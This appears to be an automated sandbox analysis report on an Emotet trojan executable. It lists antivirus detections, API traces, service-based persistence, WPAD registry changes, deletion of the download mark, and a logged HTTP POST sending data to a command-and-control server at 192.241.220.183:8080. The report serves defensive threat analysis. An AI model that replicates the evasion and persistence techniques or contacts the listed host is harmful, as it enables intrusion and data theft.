9.6
Critical

200377720d42c4f7fe16223d5888b11a1955d9d060d7bd01c09d9f378d41f774

0526f4e11cb86ca73e6c5621fddb342b.exe

Analysis duration

89s

Latest analysis

File size

136.1KB
Static scan: malicious. Dynamic scan: malicious. 100% AFW2WFAGSKK AI SCORE=82 AIDETECTVM ATTRIBUTE BANKERX CLASSIC CONFIDENCE ELDORADO EMOTET EMOTETU GENCIRC HIGH CONFIDENCE HIGHCONFIDENCE IY1@A0NYPPMI IY1@B0NYPPMI KCLOUD KRYPTIK MALWARE1 MALWARE@#25CIOIOBDC8NN QQXKG R339917 SCORE SUSGEN TRICKBOT UNSAFE ZEXTET
Eagle Eye (鹰眼) engine
Not detected: no Eagle Eye engine detection results are available yet
Static verdict
Antivirus engines
Engine | Result | Scan time | Engine version
Alibaba Trojan:Win32/Emotet.476ddc06 20190527 0.3.0.5
Avast Win32:BankerX-gen [Trj] 20201210 21.1.5827.0
Tencent Malware.Win32.Gencirc.1192d417 20201211 1.0.0.1
Baidu 20190318 1.0.0.2
Kingsoft Win32.Hack.Emotet.k.(kcloud) 20201211 2017.9.26.565
McAfee Emotet-FQX!0526F4E11CB8 20201211 6.0.6.653
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
Static indicators
Queries for the computername (1 event)
Time & API Arguments Status Return Repeated
1619164725.306751
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Uses Windows APIs to generate a cryptographic key (3 events)
Time & API Arguments Status Return Repeated
1619164709.759751
CryptGenKey
crypto_handle: 0x00590840
algorithm_identifier: 0x0000660e ()
provider_handle: 0x00590508
flags: 1
key: fBeaÂå 0éÖÏýôÉ{Á
success 1 0
1619164725.353751
CryptExportKey
crypto_handle: 0x00590840
crypto_export_handle: 0x00590800
buffer: f¤3*;qJ†)ß’G¢â_ýôkú$€ºãhvìYᆠç"(Džk ç‰îi_^í¡—)”áÌozöwg«¿ePWã½ÊM<²‘B¾®kâÒm‹]`s"ê¯w
blob_type: 1
flags: 64
success 1 0
1619164758.806751
CryptExportKey
crypto_handle: 0x00590840
crypto_export_handle: 0x00590800
buffer: f¤“Ôæ–\QDÁ#y¦ü.ÚaÙ|­ȁ ¹ìoZg;€Fî=‘çŒ–£uò@-]JŽ–°Õ†miRŠhˆþ«”¾X¤ª;:}3çm…¯’~”Õ ý0ɪåì¯ Ô_¯žD
blob_type: 1
flags: 64
success 1 0
The executable uses a known packer (1 event)
packer Armadillo v1.71
The file contains an unknown PE resource name possibly indicative of a packer (1 event)
resource name None
Behavioral verdict
Dynamic indicators
HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)
suspicious_features Connection to IP address suspicious_request POST http://192.241.220.183:8080/NEeXLA5YF/gtpO/nKKZRKkvzemSC/oHNk4TOLaIG9obqBuPG/
Performs some HTTP requests (1 event)
request POST http://192.241.220.183:8080/NEeXLA5YF/gtpO/nKKZRKkvzemSC/oHNk4TOLaIG9obqBuPG/
Sends data using the HTTP POST method (1 event)
request POST http://192.241.220.183:8080/NEeXLA5YF/gtpO/nKKZRKkvzemSC/oHNk4TOLaIG9obqBuPG/
Allocates read-write-execute memory (usually to unpack itself) (3 events)
Time & API Arguments Status Return Repeated
1619134516.625727
NtAllocateVirtualMemory
process_identifier: 2712
region_size: 40960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x007e0000
success 0 0
1619164775.415374
NtAllocateVirtualMemory
process_identifier: 1424
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0000000004070000
success 0 0
1619164704.681751
NtAllocateVirtualMemory
process_identifier: 2476
region_size: 40960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00480000
success 0 0
Checks whether any human activity is being performed by constantly checking whether the foreground window changed
Moves the original executable to a new location (1 event)
Time & API Arguments Status Return Repeated
1619134519.672727
MoveFileWithProgressW
oldfilepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\0526f4e11cb86ca73e6c5621fddb342b.exe
newfilepath: C:\Windows\SysWOW64\NlsData0027\NlsData0027.exe
newfilepath_r: C:\Windows\SysWOW64\NlsData0027\NlsData0027.exe
flags: 3
oldfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\0526f4e11cb86ca73e6c5621fddb342b.exe
success 1 0
Checks adapter addresses, which can be used to detect virtual network interfaces (1 event)
Time & API Arguments Status Return Repeated
1619164725.759751
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
Expresses interest in specific running processes (1 event)
process nlsdata0027.exe
Reads the system's User Agent and subsequently performs requests (1 event)
Time & API Arguments Status Return Repeated
1619164725.446751
InternetOpenW
proxy_bypass:
access_type: 0
proxy_name:
flags: 0
user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
success 13369348 0
Network communication
Communicates with host for which no DNS query was performed (3 events)
host 172.217.24.14
host 190.19.169.69
host 192.241.220.183
Installs itself for autorun at Windows startup (1 event)
service_name NlsData0027 service_path C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\NlsData0027\NlsData0027.exe"
Created a service where a service was also not started (1 event)
Time & API Arguments Status Return Repeated
1619134520.063727
CreateServiceW
service_start_name:
start_type: 2
service_handle: 0x024301b8
display_name: NlsData0027
error_control: 0
service_name: NlsData0027
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\NlsData0027\NlsData0027.exe"
filepath_r: "C:\Windows\SysWOW64\NlsData0027\NlsData0027.exe"
service_manager_handle: 0x008792f8
desired_access: 2
service_type: 16
password:
success 37945784 0
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 events)
Time & API Arguments Status Return Repeated
1619164728.337751
RegSetValueExA
key_handle: 0x0000036c
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619164728.337751
RegSetValueExA
key_handle: 0x0000036c
value: À’+ò7×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619164728.337751
RegSetValueExA
key_handle: 0x0000036c
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619164728.337751
RegSetValueExW
key_handle: 0x0000036c
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619164728.353751
RegSetValueExA
key_handle: 0x00000384
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619164728.353751
RegSetValueExA
key_handle: 0x00000384
value: À’+ò7×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619164728.353751
RegSetValueExA
key_handle: 0x00000384
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619164728.368751
RegSetValueExW
key_handle: 0x00000368
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
Attempts to remove evidence of file being downloaded from the Internet (1 event)
file C:\Windows\SysWOW64\NlsData0027\NlsData0027.exe:Zone.Identifier
Connects to an IP address that is no longer responding to requests (legitimate services will usually remain up and running) (1 event)
dead_host 190.19.169.69:443
File has been identified by 53 AntiVirus engines on VirusTotal as malicious (50 out of 53 events)
Bkav W32.AIDetectVM.malware1
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.EmotetU.Gen.iy1@b0NypPmi
FireEye Trojan.EmotetU.Gen.iy1@b0NypPmi
Qihoo-360 Win32/Backdoor.59e
ALYac Trojan.EmotetU.Gen.iy1@b0NypPmi
Cylance Unsafe
K7AntiVirus Trojan ( 0056cd0a1 )
Alibaba Trojan:Win32/Emotet.476ddc06
K7GW Trojan ( 0056cd0a1 )
Arcabit Trojan.EmotetU.Gen.EDD099
BitDefenderTheta Gen:NN.Zextet.34670.iy1@a0NypPmi
Cyren W32/Trickbot.DX.gen!Eldorado
Symantec ML.Attribute.HighConfidence
APEX Malicious
Avast Win32:BankerX-gen [Trj]
ClamAV Win.Malware.Emotet-8085029-0
Kaspersky HEUR:Backdoor.Win32.Emotet.vho
BitDefender Trojan.EmotetU.Gen.iy1@b0NypPmi
Paloalto generic.ml
AegisLab Trojan.Win32.Emotet.L!c
Tencent Malware.Win32.Gencirc.1192d417
Ad-Aware Trojan.EmotetU.Gen.iy1@b0NypPmi
Emsisoft Trojan.Emotet (A)
Comodo Malware@#25cioiobdc8nn
F-Secure Trojan.TR/AD.Emotet.qqxkg
VIPRE Trojan.Win32.Generic!BT
TrendMicro TrojanSpy.Win32.EMOTET.SMT.hp
McAfee-GW-Edition BehavesLike.Win32.Emotet.cm
Sophos Mal/Generic-S
Ikarus Trojan-Banker.Emotet
Jiangmin Backdoor.Emotet.ii
Avira TR/AD.Emotet.qqxkg
MAX malware (ai score=82)
Antiy-AVL Trojan[Backdoor]/Win32.Emotet
Kingsoft Win32.Hack.Emotet.k.(kcloud)
Microsoft Trojan:Win32/Emotet.DSH!MTB
ZoneAlarm HEUR:Backdoor.Win32.Emotet.vho
GData Trojan.EmotetU.Gen.iy1@b0NypPmi
Cynet Malicious (score: 100)
AhnLab-V3 Malware/Win32.RL_Generic.R339917
McAfee Emotet-FQX!0526F4E11CB8
VBA32 Trojan.Emotet
Malwarebytes Trojan.Emotet
ESET-NOD32 Win32/Emotet.CD
TrendMicro-HouseCall TrojanSpy.Win32.EMOTET.SMT.hp
Rising Trojan.Kryptik!1.C89F (CLASSIC)
Yandex Trojan.Emotet!afw2WFagsKk
Fortinet W32/Emotet.CD!tr
AVG Win32:BankerX-gen [Trj]
Visual analysis
Binary image
No binary image: no binary visualization image was generated for this sample
Runtime screenshots
No runtime screenshots: no screenshots were generated while the sample ran


PE Compile Time

2020-06-08 18:10:55

Imports

Library MFC42.DLL:
0x40e780
0x40e784
0x40e788
0x40e78c
0x40e790
0x40e794
0x40e798
0x40e79c
0x40e7a0
0x40e7a4
0x40e7a8
0x40e7ac
0x40e7b0
0x40e7b4
0x40e7b8
0x40e7bc
0x40e7c0
0x40e7c4
0x40e7c8
0x40e7cc
0x40e7d0
0x40e7d4
0x40e7d8
0x40e7dc
0x40e7e0
0x40e7e4
0x40e7e8
0x40e7ec
0x40e7f0
0x40e7f4
0x40e7f8
0x40e7fc
0x40e800
0x40e804
0x40e808
0x40e80c
0x40e810
0x40e814
0x40e818
0x40e81c
0x40e820
0x40e824
0x40e828
0x40e82c
0x40e830
0x40e834
0x40e838
0x40e83c
0x40e840
0x40e844
0x40e848
0x40e84c
0x40e850
0x40e854
0x40e858
0x40e85c
0x40e860
0x40e864
0x40e868
0x40e86c
0x40e870
0x40e874
0x40e878
0x40e87c
0x40e880
0x40e884
0x40e888
0x40e88c
0x40e890
0x40e894
0x40e898
0x40e89c
0x40e8a0
0x40e8a4
0x40e8a8
0x40e8ac
0x40e8b0
0x40e8b4
0x40e8b8
0x40e8bc
0x40e8c0
0x40e8c4
0x40e8c8
0x40e8cc
0x40e8d0
0x40e8d4
0x40e8d8
0x40e8dc
0x40e8e0
0x40e8e4
0x40e8e8
0x40e8ec
0x40e8f0
0x40e8f4
0x40e8f8
0x40e8fc
0x40e900
0x40e904
0x40e908
0x40e90c
0x40e910
0x40e914
0x40e918
0x40e91c
0x40e920
0x40e924
0x40e928
0x40e92c
0x40e930
0x40e934
0x40e938
0x40e93c
0x40e940
0x40e944
0x40e948
0x40e94c
0x40e950
0x40e954
0x40e958
0x40e95c
0x40e960
0x40e964
0x40e968
0x40e96c
0x40e970
0x40e974
0x40e978
0x40e97c
0x40e980
0x40e984
0x40e988
0x40e98c
0x40e990
0x40e994
0x40e998
0x40e99c
0x40e9a0
0x40e9a4
0x40e9a8
0x40e9ac
0x40e9b0
0x40e9b4
0x40e9b8
0x40e9bc
0x40e9c0
0x40e9c4
0x40e9c8
0x40e9cc
0x40e9d0
0x40e9d4
0x40e9d8
0x40e9dc
0x40e9e0
0x40e9e4
0x40e9e8
0x40e9ec
0x40e9f0
0x40e9f4
0x40e9f8
0x40e9fc
0x40ea00
0x40ea04
0x40ea08
0x40ea0c
0x40ea10
0x40ea14
0x40ea18
0x40ea1c
0x40ea20
0x40ea24
0x40ea28
0x40ea2c
0x40ea30
0x40ea34
0x40ea38
0x40ea3c
0x40ea40
0x40ea44
0x40ea48
0x40ea4c
0x40ea50
0x40ea54
0x40ea58
0x40ea5c
0x40ea60
0x40ea64
0x40ea68
0x40ea6c
0x40ea70
0x40ea74
0x40ea78
0x40ea7c
0x40ea80
0x40ea84
0x40ea88
0x40ea8c
0x40ea90
0x40ea94
0x40ea98
0x40ea9c
0x40eaa0
0x40eaa4
0x40eaa8
0x40eaac
0x40eab0
0x40eab4
0x40eab8
0x40eabc
0x40eac0
0x40eac4
0x40eac8
0x40eacc
0x40ead0
Library MSVCRT.dll:
0x40ebfc __CxxFrameHandler
0x40ec00 __setusermatherr
0x40ec04 _adjust_fdiv
0x40ec08 __p__commode
0x40ec0c __p__fmode
0x40ec10 __set_app_type
0x40ec14 _except_handler3
0x40ec18 _setmbcp
0x40ec1c __dllonexit
0x40ec20 _controlfp
0x40ec24 _initterm
0x40ec28 __getmainargs
0x40ec2c _acmdln
0x40ec30 exit
0x40ec34 _XcptFilter
0x40ec38 _exit
0x40ec3c _onexit
Library KERNEL32.dll:
0x40e734 GetStartupInfoA
0x40e738 GetModuleHandleA
0x40e73c LoadLibraryExA
0x40e740 SizeofResource
0x40e744 GetCurrentProcess
0x40e748 lstrlenA
0x40e74c GetVersionExA
Library USER32.dll:
0x40ec78 GetSystemMenu
0x40ec7c DestroyIcon
0x40ec80 GetParent
0x40ec84 UpdateWindow
0x40ec88 CopyRect
0x40ec8c GetFocus
0x40ec90 SendMessageA
0x40ec94 FillRect
0x40ec98 DrawFocusRect
0x40ec9c LockWindowUpdate
0x40eca0 InvalidateRect
0x40eca4 EnableWindow
0x40eca8 GetSysColor
Library GDI32.dll:
Library COMCTL32.dll:
0x40e6c0 ImageList_GetIcon
0x40e6cc ImageList_Draw
0x40e6d0 ImageList_DrawEx

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49180 192.241.220.183 8080

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 63429 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 51963 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57874 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 65004 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58368 239.255.255.250 3702
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://192.241.220.183:8080/NEeXLA5YF/gtpO/nKKZRKkvzemSC/oHNk4TOLaIG9obqBuPG/
POST /NEeXLA5YF/gtpO/nKKZRKkvzemSC/oHNk4TOLaIG9obqBuPG/ HTTP/1.1
Referer: http://192.241.220.183/NEeXLA5YF/gtpO/nKKZRKkvzemSC/oHNk4TOLaIG9obqBuPG/
Content-Type: multipart/form-data; boundary=---------------------------026380977057584
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 192.241.220.183:8080
Content-Length: 4500
Connection: Keep-Alive
Cache-Control: no-cache

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.